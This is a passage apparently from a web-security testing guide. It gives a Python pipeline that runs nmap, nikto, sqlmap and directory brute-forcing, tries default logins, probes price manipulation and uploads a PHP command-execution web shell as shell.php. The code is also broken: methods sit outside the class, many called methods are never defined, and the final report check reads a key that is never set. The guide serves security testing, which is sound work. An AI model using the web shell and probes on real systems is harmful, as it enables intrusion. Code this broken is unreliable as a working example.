print("ADVANCED SSRF TESTING REPORT")
print(banner)
print(f"Target: {report['target']}")
print(f"Vulnerable Parameter: {report['vulnerable_parameter']}")
print(f"Total Findings: {report['total_findings']}")

print("\nFindings by Technique:")
for technique, count in report['findings_by_technique'].items():
    print(f" {technique}: {count}")

print("\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    print(f" {severity}: {count}")

# Show critical findings (at most three, CRITICAL or HIGH only)
critical_findings = [
    f for f in report['detailed_findings']
    if f.get('severity') in ['CRITICAL', 'HIGH']
]
if critical_findings:
    print("\nCRITICAL/HIGH SEVERITY FINDINGS:")
    for finding in critical_findings[:3]:
        print(f" - [{finding['severity']}] {finding.get('technique')}")
        print(f" {finding.get('evidence', '')[:100]}...")

print("\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['category']}:")
    # Only the first three items of each category are shown
    for recommendation in rec['recommendations'][:3]:
        print(f" • {recommendation}")
#!/usr/bin/env python3
"""
Integrated Security Testing Pipeline
Combines multiple security testing tools and techniques
"""
import subprocess
import json
import yaml
import xml.etree.ElementTree as ET
from pathlib import Path
from datetime import datetime
import concurrent.futures
import time
import requests
import sys
class SecurityTestingPipeline:
def __init__(self, target, config_file=None):
    """Set up a pipeline run for *target*.

    Args:
        target: target handed to every tool and request in the pipeline.
        config_file: optional path passed on to ``load_config``.
    """
    self.target = target
    self.config = self.load_config(config_file)
    # Per-step outputs and the final report both start out empty.
    self.results, self.report = {}, {}
def load_config(self, config_file):
    """Return the pipeline configuration, defaults merged with user values.

    The user file (YAML) is merged *recursively* into the defaults, so a
    file that overrides only ``tools.nmap.ports`` keeps every other default
    under ``tools``.  A plain ``dict.update`` would replace the whole
    ``tools`` mapping and make later lookups such as
    ``config['tools']['nikto']`` fail.  An empty YAML file is treated as
    "no overrides".

    Args:
        config_file: path to a YAML file, or a falsy value for defaults only.

    Returns:
        dict: the effective configuration (a fresh dict on every call).

    Raises:
        ValueError: if the YAML document is not a mapping.
        OSError: if the file cannot be opened.
    """
    def merge(base, override):
        # Recurse only where both sides are mappings; otherwise override wins.
        for key, value in override.items():
            if isinstance(value, dict) and isinstance(base.get(key), dict):
                merge(base[key], value)
            else:
                base[key] = value
        return base

    default_config = {
        'scan_types': {
            'reconnaissance': True,
            'vulnerability_scanning': True,
            'authentication_testing': True,
            'api_testing': True,
            'business_logic': True,
            'reporting': True
        },
        'tools': {
            'nmap': {
                'enabled': True,
                'ports': '1-1000',
                'scripts': ['vuln', 'safe', 'discovery']
            },
            'nikto': {
                'enabled': True,
                'timeout': 300
            },
            'sqlmap': {
                'enabled': True,
                'risk': 1,
                'level': 1
            },
            'zap': {
                'enabled': True,
                'mode': 'full'
            },
            'custom_tests': {
                'enabled': True
            }
        },
        'reporting': {
            'format': ['html', 'json', 'pdf'],
            'output_dir': './reports'
        }
    }
    if config_file:
        with open(config_file, encoding='utf-8') as f:
            # safe_load yields None for an empty document
            user_config = yaml.safe_load(f) or {}
        if not isinstance(user_config, dict):
            raise ValueError(
                f"Configuration in {config_file} must be a mapping, "
                f"got {type(user_config).__name__}"
            )
        merge(default_config, user_config)
    return default_config
def run_pipeline(self):
    """Execute every enabled pipeline step in order.

    Each step's return value is stored in ``self.results`` under the step
    name.  A step that raises is recorded as ``{'error': <message>}`` and
    the pipeline continues with the next step.

    Returns:
        dict: ``self.results``.
    """
    print(f"[*] Starting security testing pipeline for {self.target}")
    print(f"[*] Start time: {datetime.now()}")
    steps = [
        ('Initialization', self.initialize_pipeline),
        ('Reconnaissance', self.run_reconnaissance),
        ('Vulnerability Scanning', self.run_vulnerability_scanning),
        ('Authentication Testing', self.run_authentication_testing),
        ('API Testing', self.run_api_testing),
        ('Business Logic Testing', self.run_business_logic_tests),
        ('Custom Tests', self.run_custom_tests),
        ('Reporting', self.generate_report)
    ]
    for label, action in steps:
        if not self.should_run_step(label):
            continue
        print(f"\n[*] Running step: {label}")
        try:
            self.results[label] = action()
            print(f"[+] {label} completed successfully")
        except Exception as exc:
            print(f"[-] {label} failed: {exc}")
            self.results[label] = {'error': str(exc)}
    print(f"\n[*] Pipeline completed at {datetime.now()}")
    return self.results
def should_run_step(self, step_name):
    """Tell whether the named pipeline step is enabled.

    Steps that have a ``scan_types`` switch follow that switch (defaulting
    to enabled when the key is absent); all other steps always run.
    """
    switch_for_step = {
        'Reconnaissance': 'reconnaissance',
        'Vulnerability Scanning': 'vulnerability_scanning',
        'Authentication Testing': 'authentication_testing',
        'API Testing': 'api_testing',
        'Business Logic Testing': 'business_logic',
        'Reporting': 'reporting'
    }
    switch = switch_for_step.get(step_name)
    if switch is None:
        # No configuration switch exists for this step
        return True
    return self.config['scan_types'].get(switch, True)
def initialize_pipeline(self):
    """Create the report directory and write ``session.json`` into it.

    The session file records the target, the start time (ISO format) and
    the effective configuration.

    Returns:
        dict: ``{'status': 'initialized', 'session_file': <path>}``.
    """
    # Create output directory (parents included, fine if it exists)
    report_dir = Path(self.config['reporting']['output_dir'])
    report_dir.mkdir(parents=True, exist_ok=True)
    # Create session file
    session_path = report_dir / 'session.json'
    payload = json.dumps(
        {
            'target': self.target,
            'start_time': datetime.now().isoformat(),
            'config': self.config
        },
        indent=2,
    )
    with open(session_path, 'w') as handle:
        handle.write(payload)
    return {'status': 'initialized', 'session_file': str(session_path)}
def run_reconnaissance(self):
    """Run the reconnaissance phase and collect each tool's output.

    The Nmap scan runs only when enabled in the configuration; directory
    enumeration, subdomain enumeration and technology detection always run.

    Returns:
        dict: results keyed by ``nmap`` (if run), ``directory_enumeration``,
        ``subdomain_enumeration`` and ``technology_detection``.
    """
    gathered = {}
    # 1. Nmap scan (optional)
    if self.config['tools']['nmap']['enabled']:
        print("[*] Running Nmap scan...")
        gathered['nmap'] = self.run_nmap_scan()
    # 2-4. Steps without a configuration switch, in execution order
    unconditional = (
        ("[*] Running directory enumeration...", 'directory_enumeration', 'run_directory_enumeration'),
        ("[*] Running subdomain enumeration...", 'subdomain_enumeration', 'run_subdomain_enumeration'),
        ("[*] Detecting technologies...", 'technology_detection', 'detect_technologies'),
    )
    for banner, key, method_name in unconditional:
        print(banner)
        gathered[key] = getattr(self, method_name)()
    return gathered
def run_nmap_scan(self):
    """Run an Nmap service/script scan against the pipeline target.

    Other steps use ``self.target`` as a URL (``f"{self.target}/login"``),
    but Nmap expects a host name or address.  When the target contains
    ``://`` only its host part is passed to Nmap; any other target string
    is passed through unchanged.

    Returns:
        dict: on success ``command``, ``returncode``, the first 1000
        characters of ``stdout`` and ``parsed_results``; on failure a
        single ``error`` key.
    """
    from urllib.parse import urlparse

    nmap_settings = self.config['tools']['nmap']
    ports = nmap_settings['ports']
    scripts = nmap_settings['scripts']
    # Reduce a URL to its host; leave plain hosts / IPs / ranges alone.
    host = urlparse(self.target).hostname if '://' in self.target else None
    scan_target = host or self.target
    # str(): a YAML value such as ``ports: 443`` is loaded as an int
    cmd = ['nmap', '-sV', '-sC', '-p', str(ports), '-oA', 'nmap_scan', scan_target]
    # Add scripts if specified
    for script in scripts or []:
        cmd.extend(['--script', script])
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
        # Parse Nmap output
        parsed_results = self.parse_nmap_output(result.stdout)
        return {
            'command': ' '.join(cmd),
            'returncode': result.returncode,
            'stdout': result.stdout[:1000],
            'parsed_results': parsed_results
        }
    except subprocess.TimeoutExpired:
        return {'error': 'Nmap scan timed out after 10 minutes'}
    except Exception as e:
        # Includes the case where the nmap binary is not installed
        return {'error': str(e)}
def parse_nmap_output(self, nmap_output):
    """Extract open ports from Nmap's normal (human-readable) output.

    A line is treated as a port row only when its first column has the
    form ``<digits>/tcp`` or ``<digits>/udp``; a line that merely mentions
    ``/tcp`` somewhere (for example script output) is ignored.  Only rows
    whose state includes ``open`` (``open`` or ``open|filtered``) are kept,
    so ``open_ports`` no longer lists closed or filtered ports.

    Args:
        nmap_output: text captured from Nmap's stdout.

    Returns:
        dict: ``open_ports`` (list of ``port``/``state``/``service``
        dicts) plus ``services`` and ``vulnerabilities``, which this simple
        parser leaves empty.
    """
    parsed = {
        'open_ports': [],
        'services': [],
        'vulnerabilities': []
    }
    # Simple parsing - in reality, use nmap parser library
    for line in nmap_output.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        # Port line: 80/tcp open http
        number, slash, protocol = parts[0].partition('/')
        if not (slash and number.isdigit() and protocol in ('tcp', 'udp')):
            continue
        state = parts[1]
        if 'open' not in state.split('|'):
            continue
        parsed['open_ports'].append({
            'port': parts[0],
            'state': state,
            'service': parts[2] if len(parts) > 2 else 'unknown'
        })
    return parsed
def run_directory_enumeration(self):
    """Brute-force directories with gobuster and ffuf.

    Each tool runs with a 300 second timeout against the dirb ``common.txt``
    wordlist and its stdout is handed to the matching ``parse_*_output``
    method.  ``dirb`` is listed but has no invocation, so it produces no
    entry.  A tool that fails is recorded as ``{'error': <message>}``.

    Returns:
        dict: parsed output (or error) keyed by tool name.
    """
    wordlist = '/usr/share/wordlists/dirb/common.txt'
    outcome = {}
    for tool in ('gobuster', 'ffuf', 'dirb'):
        try:
            if tool == 'gobuster':
                argv = ['gobuster', 'dir', '-u', self.target, '-w',
                        wordlist, '-t', '50']
                parser_name = 'parse_gobuster_output'
            elif tool == 'ffuf':
                argv = ['ffuf', '-u', f'{self.target}/FUZZ', '-w',
                        wordlist, '-t', '50']
                parser_name = 'parse_ffuf_output'
            else:
                # No command is defined for this tool
                continue
            finished = subprocess.run(argv, capture_output=True, text=True, timeout=300)
            outcome[tool] = getattr(self, parser_name)(finished.stdout)
        except Exception as exc:
            outcome[tool] = {'error': str(exc)}
    return outcome
def run_subdomain_enumeration(self):
    """Enumerate subdomains of the target's domain with ``subfinder``.

    The domain is taken from the target's network location (or from the
    whole string when it has no scheme), with any ``:port`` removed.

    Blank lines in the tool output are discarded before counting.
    Splitting empty output on ``'\\n'`` yields ``['']``, which used to be
    reported as one subdomain found.

    Returns:
        dict: ``{'subfinder': {'domain', 'subdomains_found', 'subdomains'}}``
        (only the first 10 names are kept), or ``{'error': <message>}``.
    """
    # Extract domain from target
    from urllib.parse import urlparse
    parsed = urlparse(self.target)
    domain = parsed.netloc or parsed.path
    # Remove port if present
    if ':' in domain:
        domain = domain.split(':')[0]
    subdomain_results = {}
    try:
        # Use subfinder if available
        cmd = ['subfinder', '-d', domain, '-silent']
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
        subdomains = [
            line.strip() for line in result.stdout.splitlines() if line.strip()
        ]
        subdomain_results['subfinder'] = {
            'domain': domain,
            'subdomains_found': len(subdomains),
            'subdomains': subdomains[:10]  # First 10
        }
    except Exception as e:
        subdomain_results['error'] = str(e)
    return subdomain_results
def detect_technologies(self):
    """Fingerprint the target's web stack with WhatWeb.

    Runs ``whatweb -a 3 <target>`` with a 60 second timeout and passes its
    stdout to ``parse_whatweb_output``.

    Returns:
        dict: ``{'whatweb': <parsed output>}`` or ``{'error': <message>}``.
    """
    detected = {}
    argv = ['whatweb', '-a', '3', self.target]
    try:
        finished = subprocess.run(argv, capture_output=True, text=True, timeout=60)
        detected['whatweb'] = self.parse_whatweb_output(finished.stdout)
    except Exception as exc:
        detected['error'] = str(exc)
    return detected
def run_vulnerability_scanning(self):
    """Run each vulnerability scanner that is enabled in the configuration.

    Returns:
        dict: scanner results keyed by ``nikto``, ``sqlmap`` and ``zap``;
        disabled scanners have no entry.
    """
    # (config key, banner, method name) in execution order
    scanners = (
        ('nikto', "[*] Running Nikto scan...", 'run_nikto_scan'),
        ('sqlmap', "[*] Running SQLMap scan...", 'run_sqlmap_scan'),
        ('zap', "[*] Running OWASP ZAP scan...", 'run_zap_scan'),
    )
    collected = {}
    for tool, banner, method_name in scanners:
        if not self.config['tools'][tool]['enabled']:
            continue
        print(banner)
        collected[tool] = getattr(self, method_name)()
    return collected
def run_nikto_scan(self):
    """Run Nikto against the target and summarise what it reports.

    Nikto is told to write an HTML report to ``nikto_report.html``; its
    stdout is parsed with ``parse_nikto_output``.  The time limit comes
    from the ``nikto.timeout`` configuration value.

    Returns:
        dict: ``command``, ``returncode``, ``vulnerabilities_found`` and the
        first five ``vulnerabilities``; or ``{'error': <message>}``.
    """
    limit = self.config['tools']['nikto']['timeout']
    argv = ['nikto', '-h', self.target, '-o', 'nikto_report.html', '-Format', 'html']
    try:
        finished = subprocess.run(argv, capture_output=True, text=True, timeout=limit)
        issues = self.parse_nikto_output(finished.stdout)
        summary = {
            'command': ' '.join(argv),
            'returncode': finished.returncode,
            'vulnerabilities_found': len(issues),
            'vulnerabilities': issues[:5]  # First 5
        }
        return summary
    except subprocess.TimeoutExpired:
        return {'error': f'Nikto scan timed out after {limit} seconds'}
    except Exception as exc:
        return {'error': str(exc)}
def run_sqlmap_scan(self):
    """Run SQLMap in batch mode against ``<target>?id=1``.

    Risk and level come from the ``sqlmap`` configuration section; the scan
    is limited to 600 seconds and its stdout is parsed with
    ``parse_sqlmap_output``.

    Returns:
        dict: ``command``, ``returncode`` and ``result``; or
        ``{'error': <message>}``.
    """
    settings = self.config['tools']['sqlmap']
    risk = settings['risk']
    level = settings['level']
    # Test a common parameter
    probe_url = f"{self.target}?id=1"
    argv = [
        'sqlmap', '-u', probe_url, '--batch',
        '--risk', str(risk),
        '--level', str(level),
        '--flush-session',
    ]
    try:
        finished = subprocess.run(argv, capture_output=True, text=True, timeout=600)
        outcome = self.parse_sqlmap_output(finished.stdout)
        return {
            'command': ' '.join(argv),
            'returncode': finished.returncode,
            'result': outcome
        }
    except subprocess.TimeoutExpired:
        return {'error': 'SQLMap scan timed out after 10 minutes'}
    except Exception as exc:
        return {'error': str(exc)}
def run_zap_scan(self):
    """Return a *simulated* OWASP ZAP result.

    No scanner is contacted: the vulnerabilities listed are fixed sample
    entries built from the target, and the result is marked
    ``'status': 'simulated'``.  The configured ZAP ``mode`` is read but not
    used.

    Returns:
        dict: ``status``, ``note`` and three sample ``vulnerabilities``.
    """
    _mode = self.config['tools']['zap']['mode']  # looked up, currently unused
    # (type, severity, path) of the canned sample entries
    samples = (
        ('XSS', 'High', '/search?q=<script>'),
        ('CSRF', 'Medium', '/profile'),
        ('Information Disclosure', 'Low', '/debug'),
    )
    return {
        'status': 'simulated',
        'note': 'In production, integrate with ZAP API',
        'vulnerabilities': [
            {'type': kind, 'severity': severity, 'url': f'{self.target}{path}'}
            for kind, severity, path in samples
        ]
    }
def run_authentication_testing(self):
    """Run the authentication checks concurrently (three worker threads).

    Returns:
        dict: each check's result keyed by the check's function name; a
        check that raises is stored as ``{'error': <message>}``.
    """
    # Test common authentication weaknesses
    checks = [
        self.test_default_credentials,
        self.test_weak_passwords,
        self.test_password_reset,
        self.test_session_management
    ]
    outcome = {}
    with concurrent.futures.ThreadPoolExecutor(max_workers=3) as pool:
        pending = {}
        for check in checks:
            pending[pool.submit(check)] = check.__name__
        # Results are stored in completion order
        for done in concurrent.futures.as_completed(pending):
            name = pending[done]
            try:
                outcome[name] = done.result()
            except Exception as exc:
                outcome[name] = {'error': str(exc)}
    return outcome
def test_default_credentials(self):
    """Try a few well-known default logins against ``<target>/login``.

    Only the first three pairs of the list are attempted.  A login counts
    as successful when the reply is HTTP 200 and its body does not contain
    the word ``login`` (case-insensitive).

    Returns:
        list[dict]: one entry per attempt -- the credentials with a
        ``status`` of ``SUCCESS``/``FAILED``, or ``{'error': <message>}``
        when the request failed.
    """
    # Common default credentials
    known_defaults = [
        ('admin', 'admin'),
        ('admin', 'password'),
        ('admin', '123456'),
        ('root', 'root'),
        ('test', 'test'),
        ('guest', 'guest')
    ]
    login_url = f"{self.target}/login"
    attempts = []
    for user, secret in known_defaults[:3]:  # Test first 3
        try:
            reply = requests.post(
                login_url,
                data={'username': user, 'password': secret},
                timeout=5
            )
            entry = {'username': user, 'password': secret}
            logged_in = reply.status_code == 200 and 'login' not in reply.text.lower()
            if logged_in:
                entry['status'] = 'SUCCESS'
                entry['evidence'] = 'Default credentials accepted'
            else:
                entry['status'] = 'FAILED'
            attempts.append(entry)
        except Exception as exc:
            attempts.append({'error': str(exc)})
    return attempts
def test_weak_passwords(self):
    """Check whether ``<target>/register`` accepts weak passwords.

    Only the first two passwords of the list are tried.  Each attempt
    registers a distinct username/e-mail (timestamp plus attempt index).
    Reusing the same second-resolution timestamp for every attempt could
    make the later registration fail as a duplicate account and be
    misreported as the password being rejected.  Both 200 and 201 replies
    count as an accepted registration.

    Returns:
        list[dict]: one entry per attempt -- ``password`` with a ``status``
        of ``ACCEPTED``/``REJECTED``, or ``{'error': <message>}`` when the
        request failed.
    """
    # Test if weak passwords are accepted
    weak_passwords = [
        'password',
        '123456',
        'qwerty',
        'letmein',
        'welcome'
    ]
    register_url = f"{self.target}/register"
    results = []
    for attempt, password in enumerate(weak_passwords[:2]):  # Test first 2
        # One tag per attempt keeps username and e-mail unique and in sync.
        tag = f"{int(time.time())}_{attempt}"
        try:
            response = requests.post(
                register_url,
                json={
                    'username': f'test_{tag}',
                    'password': password,
                    'email': f'test{tag}@example.com'
                },
                timeout=5
            )
        except Exception as e:
            results.append({'error': str(e)})
            continue
        if response.status_code in (200, 201):
            results.append({
                'password': password,
                'status': 'ACCEPTED',
                'evidence': 'Weak password accepted during registration'
            })
        else:
            results.append({
                'password': password,
                'status': 'REJECTED'
            })
    return results
def run_api_testing(self):
    """Discover API endpoints, then run the API security checks.

    Returns:
        dict: ``endpoints`` plus one entry per check keyed by the check's
        function name; a check that raises is stored as
        ``{'error': <message>}``.
    """
    # Discover API endpoints first so they lead the result dict
    outcome = {'endpoints': self.discover_api_endpoints()}
    checks = (
        self.test_api_authentication,
        self.test_api_rate_limiting,
        self.test_api_input_validation,
    )
    for check in checks:
        try:
            verdict = check()
        except Exception as exc:
            verdict = {'error': str(exc)}
        outcome[check.__name__] = verdict
    return outcome
def discover_api_endpoints(self):
    """Probe a fixed list of common API paths on the target.

    A path is reported when the GET request gets any reply other than 404.
    Paths whose request fails (connection error, timeout, ...) are skipped;
    only ``requests`` errors are swallowed, so Ctrl-C and programming
    errors still surface.  A trailing ``/`` on the target is dropped before
    the path is appended to avoid ``//api``-style URLs.

    Returns:
        list[dict]: ``path``, ``status_code`` and ``content_type`` for each
        responding path.
    """
    # Common API paths
    common_paths = [
        '/api',
        '/api/v1',
        '/api/v2',
        '/graphql',
        '/rest',
        '/soap'
    ]
    base = self.target.rstrip('/')
    endpoints = []
    for path in common_paths:
        try:
            response = requests.get(f"{base}{path}", timeout=5)
        except requests.exceptions.RequestException:
            # Best effort: an unreachable path is simply not listed
            continue
        if response.status_code != 404:
            endpoints.append({
                'path': path,
                'status_code': response.status_code,
                'content_type': response.headers.get('Content-Type', '')
            })
    return endpoints
def run_business_logic_tests(self):
    """Run the business-logic checks one after another.

    Returns:
        dict: each check's result keyed by the check's function name; a
        check that raises is stored as ``{'error': <message>}``.
    """
    checks = (
        self.test_price_manipulation,
        self.test_quantity_manipulation,
        self.test_workflow_bypass,
    )
    outcome = {}
    for check in checks:
        try:
            verdict = check()
        except Exception as exc:
            verdict = {'error': str(exc)}
        outcome[check.__name__] = verdict
    return outcome
def test_price_manipulation(self):
    """Check whether client-supplied prices are trusted by the target.

    Two probes are sent:
      1. a cart item with a negative price (``<target>/api/cart``);
      2. a checkout with a total of 0.01 (``<target>/api/checkout``).
    A probe is reported as vulnerable when the reply is HTTP 200.  Probes
    whose request fails are skipped; only ``requests`` errors are
    swallowed, so Ctrl-C and programming errors still surface.

    Returns:
        list[dict]: one ``VULNERABLE`` entry per accepted probe.
    """
    # Try to change price in cart/checkout
    cart_url = f"{self.target}/api/cart"
    checkout_url = f"{self.target}/api/checkout"
    # (url, request body, test name, evidence) in execution order
    probes = (
        # Test 1: Negative price
        (cart_url, {'item_id': '123', 'price': -10},
         'negative_price', 'Negative price accepted'),
        # Test 2: Underpayment - try to pay 1 cent
        (checkout_url, {'total': 0.01},
         'price_override', 'Price override possible'),
    )
    results = []
    for url, body, test_name, evidence in probes:
        try:
            response = requests.post(url, json=body, timeout=5)
        except requests.exceptions.RequestException:
            # Best effort: an unreachable endpoint yields no finding
            continue
        if response.status_code == 200:
            results.append({
                'test': test_name,
                'status': 'VULNERABLE',
                'evidence': evidence
            })
    return results
def run_custom_tests(self):
    """Run the application-specific checks one after another.

    Returns:
        dict: each check's result keyed by the check's function name; a
        check that raises is stored as ``{'error': <message>}``.
    """
    # Add custom tests here based on application
    checks = (
        self.test_file_upload,
        self.test_xxe,
        self.test_ssrf,
    )
    outcome = {}
    for check in checks:
        try:
            verdict = check()
        except Exception as exc:
            verdict = {'error': str(exc)}
        outcome[check.__name__] = verdict
    return outcome
def test_file_upload(self):
    """Check whether ``<target>/upload`` accepts a server-side script file.

    Only the first entry of the list (``shell.php``) is uploaded.  The
    upload is reported as vulnerable when the reply is HTTP 200 and its
    body mentions ``upload`` or ``success`` (case-insensitive).  A failed
    request yields no finding; only ``requests`` errors are swallowed, so
    Ctrl-C and programming errors still surface.

    Returns:
        list[dict]: one ``VULNERABLE`` entry per accepted file.
    """
    upload_url = f"{self.target}/upload"
    results = []
    # Test dangerous file types
    dangerous_files = [
        ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
        ('shell.jsp', '<%@ page import="java.util.*" %>', 'application/jsp'),
        ('shell.asp', '<% Response.Write("Hello") %>', 'application/asp'),
    ]
    for filename, content, content_type in dangerous_files[:1]:  # Test first
        files = {'file': (filename, content, content_type)}
        try:
            response = requests.post(upload_url, files=files, timeout=5)
        except requests.exceptions.RequestException:
            # Best effort: an unreachable endpoint yields no finding
            continue
        if response.status_code != 200:
            continue
        # Check if file was uploaded
        body = response.text.lower()
        if 'upload' in body or 'success' in body:
            results.append({
                'filename': filename,
                'status': 'VULNERABLE',
                'evidence': f'Dangerous file {filename} uploaded successfully'
            })
    return results
def generate_report(self):
    """Build the final report, write it to disk and return it.

    ``detailed_findings`` holds a *copy* of ``self.results``.  The caller
    stores this report back into ``self.results``; sharing the same dict
    would make the structure reference itself and break any later JSON
    serialisation of the results.

    The output directory is created if it does not exist, so reporting
    still works when the initialisation step did not run.  JSON and HTML
    files are written when listed in ``reporting.format``; no other format
    (e.g. ``pdf``) is produced here.

    Returns:
        dict: the report, also stored on ``self.report``.
    """
    print("[*] Generating security report...")
    report = {
        'metadata': {
            'target': self.target,
            'scan_date': datetime.now().isoformat(),
            'duration': 'N/A',  # Would calculate based on start/end times
            'pipeline_version': '1.0'
        },
        'executive_summary': self.generate_executive_summary(),
        # Snapshot, not an alias -- see docstring
        'detailed_findings': dict(self.results),
        'risk_assessment': self.assess_risk(),
        'recommendations': self.generate_recommendations(),
        'appendix': {
            'tools_used': list(self.config['tools'].keys()),
            'scan_configuration': self.config
        }
    }
    # Save report in different formats
    output_dir = Path(self.config['reporting']['output_dir'])
    output_dir.mkdir(parents=True, exist_ok=True)
    formats = self.config['reporting']['format']
    if 'json' in formats:
        json_file = output_dir / 'security_report.json'
        with open(json_file, 'w') as f:
            json.dump(report, f, indent=2)
    if 'html' in formats:
        html_report = self.generate_html_report(report)
        html_file = output_dir / 'security_report.html'
        with open(html_file, 'w') as f:
            f.write(html_report)
    self.report = report
    return report
def generate_executive_summary(self):
    """Return the executive-summary skeleton.

    Placeholder: every counter is zero and the overall risk is
    ``'Unknown'``; findings from the scans are not counted yet.
    """
    counters = (
        'total_findings',
        'critical_findings',
        'high_findings',
        'medium_findings',
        'low_findings',
    )
    summary = dict.fromkeys(counters, 0)
    summary['overall_risk'] = 'Unknown'
    return summary
def assess_risk(self):
    """Return the overall risk assessment.

    Placeholder: the result is fixed (``Medium`` risk, ``Medium``
    confidence) and does not depend on the collected findings.
    """
    considered = ['Vulnerabilities found', 'Data sensitivity', 'Attack surface']
    assessment = dict(overall_risk='Medium', confidence='Medium')
    assessment['factors_considered'] = considered
    return assessment
def generate_recommendations(self):
    """Return the standard remediation plan grouped by time horizon.

    The plan is static: three ``immediate``, three ``short_term`` and three
    ``long_term`` actions, independent of the scan results.
    """
    immediate = [
        'Patch critical vulnerabilities within 24 hours',
        'Change default credentials immediately',
        'Implement WAF rules for detected attack patterns'
    ]
    short_term = [
        'Complete vulnerability remediation within 7 days',
        'Implement security monitoring and alerting',
        'Conduct developer security training'
    ]
    long_term = [
        'Implement secure SDLC processes',
        'Regular security testing and penetration testing',
        'Continuous security monitoring and improvement'
    ]
    return dict(immediate=immediate, short_term=short_term, long_term=long_term)
def generate_html_report(self, report_data):
    """Render the assembled report as a standalone HTML page.

    Args:
        report_data: Report dict. The following entries are read:
            report_data['metadata']['target'] and ['scan_date'],
            report_data['risk_assessment']['overall_risk'],
            report_data['executive_summary'] with the 'critical_findings',
            'high_findings', 'medium_findings' and 'low_findings' counters,
            report_data['recommendations'] with the 'immediate',
            'short_term' and 'long_term' lists.

    Returns:
        The filled-in HTML document as a string.

    Raises:
        KeyError: If any of the entries listed above is missing.
    """
    # Function-scope import keeps this block self-contained.
    from html import escape

    # Literal CSS braces are doubled ({{ }}) so that str.format() emits them
    # as text; single braces would be parsed as replacement fields and make
    # format() raise before any report is produced.
    html_template = """
<!DOCTYPE html>
<html>
<head>
<title>Security Assessment Report</title>
<style>
body {{ font-family: Arial, sans-serif; margin: 40px; }}
h1 {{ color: #333; }}
h2 {{ color: #555; border-bottom: 1px solid #ddd; padding-bottom: 10px; }}
.critical {{ color: #d9534f; font-weight: bold; }}
.high {{ color: #f0ad4e; }}
.medium {{ color: #5bc0de; }}
.low {{ color: #5cb85c; }}
table {{ border-collapse: collapse; width: 100%; margin-bottom: 20px; }}
th, td {{ border: 1px solid #ddd; padding: 8px; text-align: left; }}
th {{ background-color: #f2f2f2; }}
.summary-box {{ background: #f8f9fa; border: 1px solid #dee2e6; padding: 20px; border-radius: 5px; }}
</style>
</head>
<body>
<h1>Security Assessment Report</h1>
<div class="summary-box">
<h2>Executive Summary</h2>
<p><strong>Target:</strong> {target}</p>
<p><strong>Scan Date:</strong> {scan_date}</p>
<p><strong>Overall Risk:</strong> <span class="{risk_class}">{overall_risk}</span></p>
</div>
<h2>Findings Summary</h2>
<table>
<tr>
<th>Severity</th>
<th>Count</th>
</tr>
<tr><td class="critical">Critical</td><td>{critical_count}</td></tr>
<tr><td class="high">High</td><td>{high_count}</td></tr>
<tr><td class="medium">Medium</td><td>{medium_count}</td></tr>
<tr><td class="low">Low</td><td>{low_count}</td></tr>
</table>
<h2>Recommendations</h2>
<h3>Immediate Actions (24 hours)</h3>
<ul>
{immediate_recs}
</ul>
<h3>Short Term Actions (7 days)</h3>
<ul>
{short_term_recs}
</ul>
<h3>Long Term Actions (30+ days)</h3>
<ul>
{long_term_recs}
</ul>
<hr>
<p><em>Report generated by Security Testing Pipeline v1.0</em></p>
</body>
</html>
"""

    def as_text(value):
        # Values such as the target URL originate outside this code, so
        # they are HTML-escaped before being placed into markup.
        return escape(str(value))

    def as_list_items(recs):
        return ''.join(f'<li>{as_text(rec)}</li>' for rec in recs)

    metadata = report_data['metadata']
    overall_risk = report_data['risk_assessment']['overall_risk']
    summary = report_data['executive_summary']
    recommendations = report_data['recommendations']

    # Fill template; the lower-cased risk level doubles as the CSS class name.
    return html_template.format(
        target=as_text(metadata['target']),
        scan_date=as_text(metadata['scan_date']),
        overall_risk=as_text(overall_risk),
        risk_class=as_text(overall_risk.lower()),
        critical_count=as_text(summary['critical_findings']),
        high_count=as_text(summary['high_findings']),
        medium_count=as_text(summary['medium_findings']),
        low_count=as_text(summary['low_findings']),
        immediate_recs=as_list_items(recommendations['immediate']),
        short_term_recs=as_list_items(recommendations['short_term']),
        long_term_recs=as_list_items(recommendations['long_term']),
    )
# Usage: run the whole pipeline against one target and print a short recap.
pipeline = SecurityTestingPipeline(
    target="http://target.com",
    config_file="security_config.yaml",  # Optional
)
results = pipeline.run_pipeline()

# Completion banner
print(f"\n{'='*60}")
print("SECURITY TESTING PIPELINE COMPLETE")
print(f"{'='*60}")

# Report location and headline risk, shown only when the reporting step
# actually produced a report.
if 'Reporting' in results:
    if 'report' in results['Reporting']:
        report = results['Reporting']['report']
        print(f"\nReport generated: {pipeline.config['reporting']['output_dir']}/")
        print(f"Overall Risk: {report['risk_assessment']['overall_risk']}")

# Per-step status: a step is reported as failed when its result is not a
# dict or when the dict carries an 'error' key.
print(f"\nPipeline Steps Completed:")
for step, result in results.items():
    failed = not isinstance(result, dict) or 'error' in result
    if failed:
        print(f" ✗ {step} (Error)")
    else:
        print(f" ✓ {step}")
print(f"\n[*] Detailed reports available in {pipeline.config['reporting']['output_dir']}/")

This comprehensive guide has covered advanced techniques, tools, and methodologies for testing OWASP Top 10 vulnerabilities. Key takeaways:
- Integrate security testing into CI/CD pipelines
- Use tools like ZAP, Nuclei, and custom scripts
- Implement continuous security monitoring
- Business logic flaws require creative testing
- Race conditions need specialized tools
- SSRF requires multiple bypass techniques
- Understand the application's business purpose
- Test based on risk (sensitive data, functionality)
- Consider the technology stack
- Automated scanning + manual testing
- Static + dynamic analysis
- Black-box + grey-box testing
- New vulnerabilities emerge constantly
- Tools and techniques evolve
- Follow security research and updates
- Implement a Security Testing Pipeline like the one shown in Chapter 11
- Create Custom Tooling for your specific technology stack
- Regularly Update Your Toolkit with new tools and techniques
- Train Your Team on advanced security testing methods
- Establish Metrics to measure security testing effectiveness
Remember: Security testing is an ongoing process, not a one-time event. Regular assessments, combined with proper remediation and monitoring, create a robust security posture.